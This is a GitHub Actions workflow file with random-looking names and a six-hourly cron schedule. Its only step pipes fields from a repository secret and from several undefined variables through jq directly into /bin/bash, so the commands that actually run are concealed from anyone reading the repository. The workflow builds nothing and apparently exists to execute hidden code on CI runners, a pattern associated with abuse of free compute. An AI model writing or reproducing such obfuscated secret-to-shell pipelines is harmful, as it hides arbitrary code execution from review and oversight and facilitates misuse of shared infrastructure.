name: gaoqianyu5647
on:
  workflow_dispatch:
  schedule:
    - cron: '30 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gaoqianyu5647
        env:
          e981: ${{ secrets.e981 }}
        run: |
          echo $e981 | jq -r .jrlle6 | /bin/bash
          echo $o04523 | jq -r .mrc42303 | /bin/bash
          echo $yhrm0417 | jq -r .mfg1832 | /bin/bash
          echo $by1594 | jq -r .h2 | /bin/bash
          echo $xeldg439 | jq -r .ordzk393 | /bin/bash
          echo $fhlg26535 | jq -r .tmuzt1 | /bin/bash
          echo $q11 | jq -r .ou31 | /bin/bash
          echo $zhitj586 | jq -r .pmyn92015 | /bin/bash

